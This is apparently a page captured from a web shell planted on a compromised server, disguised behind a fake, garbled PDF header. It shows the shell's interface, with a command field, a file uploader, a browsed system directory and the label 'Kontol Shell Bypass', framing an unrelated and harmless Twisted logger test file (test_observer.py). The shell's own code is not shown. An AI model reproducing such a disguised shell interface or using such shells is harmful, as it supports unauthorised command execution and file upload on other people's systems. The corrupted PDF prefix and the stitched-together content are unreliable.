%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/thread-self/root/usr/lib/python3/dist-packages/twisted/logger/test/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/thread-self/root/usr/lib/python3/dist-packages/twisted/logger/test/test_observer.py
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Test cases for L{twisted.logger._observer}.
"""

from zope.interface.verify import verifyObject, BrokenMethodImplementation

from twisted.trial import unittest

from .._logger import Logger
from .._observer import ILogObserver
from .._observer import LogPublisher



class LogPublisherTests(unittest.TestCase):
    """
    Exercise L{LogPublisher}: observer bookkeeping, event fan-out, isolation
    of failing observers, and forwarding traces.
    """

    def test_interface(self):
        """
        A L{LogPublisher} instance provides L{ILogObserver}.
        """
        subject = LogPublisher()
        try:
            verifyObject(ILogObserver, subject)
        except BrokenMethodImplementation as problem:
            # Report a verification problem as a test failure rather than
            # letting the exception escape as an error.
            self.fail(problem)


    def test_observers(self):
        """
        Observers given to the L{LogPublisher} initializer are the ones it
        holds.
        """
        # Each evaluation of the lambda expression yields a distinct function.
        first, second = [lambda event: None for _ in range(2)]

        publisher = LogPublisher(first, second)

        self.assertEqual({first, second}, set(publisher._observers))


    def test_addObserver(self):
        """
        L{LogPublisher.addObserver} registers an additional observer next to
        the ones supplied at construction time.
        """
        initial = [lambda event: None, lambda event: None]

        def lateComer(event):
            return None

        publisher = LogPublisher(*initial)
        publisher.addObserver(lateComer)

        self.assertEqual(
            set(initial + [lateComer]), set(publisher._observers)
        )


    def test_addObserverNotCallable(self):
        """
        L{LogPublisher.addObserver} raises L{TypeError} when handed an object
        that is not callable.
        """
        publisher = LogPublisher()
        notCallable = object()

        with self.assertRaises(TypeError):
            publisher.addObserver(notCallable)


    def test_removeObserver(self):
        """
        L{LogPublisher.removeObserver} drops the given observer and keeps the
        others.
        """
        keptA, dropped, keptB = [lambda event: None for _ in range(3)]

        publisher = LogPublisher(keptA, dropped, keptB)
        publisher.removeObserver(dropped)

        self.assertEqual({keptA, keptB}, set(publisher._observers))


    def test_removeObserverNotRegistered(self):
        """
        L{LogPublisher.removeObserver} leaves the registered observers
        untouched when asked to remove an observer that was never registered.
        """
        registered = [lambda event: None, lambda event: None]

        def stranger(event):
            return None

        publisher = LogPublisher(*registered)
        publisher.removeObserver(stranger)

        self.assertEqual(set(registered), set(publisher._observers))


    def test_fanOut(self):
        """
        Calling a L{LogPublisher} with an event delivers that event to every
        one of its observers.
        """
        event = {"foo": 1, "bar": 2}

        # One independent sink per observer, so each delivery can be checked
        # on its own.
        sinks = [[], [], []]

        publisher = LogPublisher(*[sink.append for sink in sinks])
        publisher(event)

        for sink in sinks:
            self.assertIn(event, sink)


    def test_observerRaises(self):
        """
        When an observer raises during fan out, the failure is logged to the
        other observers instead of being re-raised, and the raising observer
        is not sent its own failure.
        """
        event = {"foo": 1, "bar": 2}
        exception = RuntimeError("ARGH! EVIL DEATH!")

        seen = []

        def observer(event):
            # Only the very first call blows up.
            isFirstCall = len(seen) == 0
            seen.append(event)
            if isFirstCall:
                raise exception

        collected = []

        publisher = LogPublisher(observer, collected.append)
        publisher(event)

        # The raising observer did receive the original event.
        self.assertIn(event, seen)

        # Exactly one failure was reported, and it wraps our exception.
        failures = []
        for entry in collected:
            if "log_failure" in entry:
                failures.append(entry["log_failure"])
        self.assertEqual(len(failures), 1)
        self.assertIs(failures[0].value, exception)

        # The raising observer was called once only: it never saw the event
        # describing its own failure.
        self.assertEqual(len(seen), 1)


    def test_observerRaisesAndLoggerHatesMe(self):
        """
        When an observer raises during fan out and the publisher's own
        L{Logger} also raises while reporting that failure, nothing
        propagates back to the caller.
        """
        event = {"foo": 1, "bar": 2}
        exception = RuntimeError("ARGH! EVIL DEATH!")

        class GurkLogger(Logger):
            def failure(self, *args, **kwargs):
                raise exception

        def observer(event):
            raise RuntimeError("Sad panda")

        publisher = LogPublisher(observer)
        publisher.log = GurkLogger()

        # Reaching the end of this call without an exception is the whole
        # assertion.
        publisher(event)


    def test_trace(self):
        """
        An event carrying a C{"log_trace"} list accumulates one
        C{(publisher, observer)} entry per observer it is forwarded to.
        """
        event = {"foo": 1, "bar": 2, "log_trace": []}

        traces = {}

        def snapshotInto(key):
            """
            Build an observer that records the trace as it looks at the
            moment the observer is called.
            """
            def observer(e):
                # Freeze the trace into a tuple: the list on the event is
                # shared and keeps growing, so storing it directly would make
                # every observer's view look the same.
                return traces.setdefault(key, tuple(e["log_trace"]))
            return observer

        first = snapshotInto(1)
        second = snapshotInto(2)

        publisher = LogPublisher(first, second)
        publisher(event)

        self.assertEqual(traces[1], ((publisher, first),))
        self.assertEqual(
            traces[2], ((publisher, first), (publisher, second))
        )

Kontol Shell Bypass